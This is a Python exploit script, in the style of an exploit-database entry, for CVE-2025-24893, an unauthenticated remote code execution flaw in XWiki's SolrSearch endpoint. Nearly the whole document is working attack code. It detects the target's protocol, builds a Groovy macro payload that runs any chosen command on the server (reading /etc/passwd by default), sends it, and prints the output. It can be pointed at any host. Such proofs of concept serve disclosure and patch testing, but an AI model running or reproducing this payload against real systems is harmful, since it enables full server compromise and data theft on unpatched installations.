
# Exploit Title: XWiki Platform - Remote Code Execution
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-24893
# Vendor Homepage: https://www.xwiki.org/
# Software Link: https://github.com/xwiki/xwiki-platform
# Version: Affected versions up to and including XWiki 15.10.10 (the fixed
#          releases listed below imply the 16.x branch before 16.4.1 is also
#          affected; see the advisory for the exact ranges)
# Tested Versions: XWiki 15.10.10
# Vulnerability Type: Remote Code Execution (RCE)
# CVSS Score: 9.8 (Critical)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
#
# Description:
# XWiki Platform suffers from a critical vulnerability where any guest user can
# execute arbitrary code remotely through the SolrSearch endpoint. This can lead
# to a full server compromise, including the ability to execute commands on the
# underlying system. The vulnerability impacts the confidentiality, integrity,
# and availability of the XWiki installation. The issue has been patched in XWiki
# versions 15.10.11, 16.4.1, and 16.5.0RC1.
#
# What this script does: it probes the target over HTTPS then HTTP, sends a single
# unauthenticated GET to /bin/get/Main/SolrSearch whose `text` parameter carries a
# Groovy macro that runs `cat /etc/passwd`, and reports success when the response
# contains "root:". Use only against systems you are authorized to test.
#
# Proof of Concept: Yes
# Categories: XWiki, Remote Code Execution, CVE-2025, RCE
# References:
# - GHSA Advisory: https://github.com/advisories/GHSA-rr6p-3pfg-562j
# - NVD CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-24893
# - GitHub Exploit Link: https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py
import sys
from urllib.parse import quote

import requests
# Banner
def display_banner():
    """Print the tool's header (title, author, upstream link) to stdout.

    Purely cosmetic: five lines, the first and last being an 80-character rule.
    """
    rule = "=" * 80
    header_lines = (
        rule,
        "Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code Execution",
        "Exploit Author: Al Baradi Joy",
        "GitHub Exploit: https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py",
        rule,
    )
    print("\n".join(header_lines))
# Function to detect the target protocol (HTTP or HTTPS)
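def detect_protocol(domain):
    """Return the base URL ("https://<domain>" or "http://<domain>") the target answers on.

    HTTPS is probed first; HTTP is tried only if HTTPS is unreachable or answers with
    a 4xx/5xx. A scheme counts as usable when a GET of the site root returns a status
    below 400 (redirects are followed, so the final status is what is checked). Probing
    the root is a heuristic: the vulnerable endpoint lives under /bin/get/..., and a root
    that is blocked while the endpoint is reachable will make this function give up.

    Security notes for operators:
      * The HTTP fallback is a protocol downgrade -- the payload sent afterwards (and any
        command output coming back) travels in cleartext.
      * TLS certificate verification is left at the `requests` default (enabled). A
        target with a self-signed certificate therefore raises SSLError here and is
        silently downgraded to HTTP rather than being probed over TLS.

    Args:
        domain: host or host:port, without a scheme.

    Returns:
        The usable base URL, without a trailing slash.

    Raises:
        SystemExit: when neither scheme yields a usable response. (The original
            implementation fell through and returned None when both schemes answered
            with >= 400, which later produced a "None/bin/get/..." request URL.)
    """
    https_url = f"https://{domain}"
    http_url = f"http://{domain}"

    try:
        response = requests.get(https_url, timeout=5, allow_redirects=True)
        if response.status_code < 400:
            print(f"[✔] Target supports HTTPS: {https_url}")
            return https_url
        # Reachable over TLS but not usable; say so instead of falling through silently.
        print(f"[!] HTTPS answered {response.status_code}, falling back to HTTP.")
    except requests.exceptions.RequestException:
        print("[!] HTTPS not available, falling back to HTTP.")

    try:
        response = requests.get(http_url, timeout=5, allow_redirects=True)
    except requests.exceptions.RequestException:
        print("[✖] Target is unreachable on both HTTP and HTTPS.")
        sys.exit(1)

    if response.status_code < 400:
        print(f"[✔] Target supports HTTP: {http_url}")
        return http_url

    # Both schemes answered, but neither with a usable status: there is no base URL
    # to build the exploit request on, so stop here rather than return None.
    print(f"[✖] Target answered {response.status_code} on HTTP and nothing usable on HTTPS.")
    sys.exit(1)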
# Exploit function
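def _groovy_string(value):
    """Escape *value* for embedding inside a Groovy double-quoted string literal.

    Backslash, the double quote and `$` (GString interpolation) are the characters
    that would otherwise break out of, or alter, the generated `println("...")` call.
    """
    return value.replace("\\", "\\\\").replace('"', '\\"').replace("$", "\\$")


def exploit(target_url, *, command="cat /etc/passwd", success_marker="root:"):
    """Send the CVE-2025-24893 Groovy-macro payload to the target's SolrSearch page.

    The request is an unauthenticated GET to `/bin/get/Main/SolrSearch` whose `text`
    parameter carries wiki syntax: a leading `}}}` (presumably closing the verbatim
    block the search template wraps the parameter in -- see the advisory) followed by
    `{{async async=false}}{{groovy}}println("<command>".execute().text){{/groovy}}{{/async}}`.
    On an unpatched instance the Groovy script runs server-side and its stdout lands in
    the RSS response body.

    Args:
        target_url: host or host:port; a leading http:// or https:// and trailing
            slashes are stripped, then the usable scheme is detected via
            detect_protocol().
        command: program to run on the target. Groovy's String.execute() tokenizes on
            whitespace and starts the program directly (no shell), so pipes, redirects
            and quoting are not interpreted -- confirm against the target's Groovy
            version if relying on that. The value is escaped for the Groovy string
            literal it is embedded in.
        success_marker: substring whose presence in a 200 response is treated as
            proof of execution. The default matches a Unix /etc/passwd; change it
            together with `command` (a Windows target or a different command will
            otherwise be reported as a failure even though the code ran).

    Returns:
        True when the marker was found in a 200 response, False otherwise
        (including transport errors, which are reported on stdout).

    Operational notes:
        The full request URL, payload included, is printed and may end up in shell
        history or logs. If detect_protocol() chose HTTP, everything travels in
        cleartext. Use only against systems you are authorized to test.
    """
    # Normalize the operator-supplied target: drop a scheme prefix (only at the
    # start, unlike the previous str.replace which removed it anywhere) and any
    # trailing slash that would otherwise yield "https://host//bin/get/...".
    host = target_url.strip()
    for scheme in ("https://", "http://"):
        if host.startswith(scheme):
            host = host[len(scheme):]
            break
    host = host.rstrip("/")

    base_url = detect_protocol(host)
    if not base_url:
        # Defensive: never build a "None/bin/get/..." URL if detection yields nothing.
        print("[✖] Could not determine a usable base URL for the target.")
        return False

    groovy_call = f'println("{_groovy_string(command)}".execute().text)'
    payload = "}}}{{async async=false}}{{groovy}}" + groovy_call + "{{/groovy}}{{/async}}"
    # quote(..., safe="") percent-encodes everything but unreserved characters; the
    # server decodes it back to the same wiki syntax the hand-encoded URL carried.
    exploit_url = f"{base_url}/bin/get/Main/SolrSearch?media=rss&text={quote(payload, safe='')}"

    try:
        print(f"[+] Sending request to: {exploit_url}")
        response = requests.get(exploit_url, timeout=10)
    except requests.exceptions.ConnectionError:
        print("[✖] Connection failed. Target may be down.")
        return False
    except requests.exceptions.Timeout:
        print("[✖] Request timed out. Target is slow or unresponsive.")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[✖] Unexpected error: {e}")
        return False

    # A 200 without the marker may still mean the macro ran (patched instances render
    # the text literally, unpatched ones with a failing command return an error), so
    # only the marker is taken as evidence.
    if response.status_code == 200 and success_marker in response.text:
        print("[✔] Exploit successful! Output received:")
        print(response.text)
        return True

    print(f"[✖] Exploit failed. Status code: {response.status_code}")
    return False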
# Main execution
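if __name__ == "__main__":
    display_banner()
    # Accept the target as the first CLI argument so the tool can be scripted;
    # fall back to the interactive prompt otherwise.
    if len(sys.argv) > 1:
        target = sys.argv[1].strip()
    else:
        target = input("[?] Enter the target URL (without http/https): ").strip()
    if not target:
        # An empty target would otherwise be probed as "https://" and fail confusingly.
        print("[✖] No target given.")
        sys.exit(2)
    exploit(target)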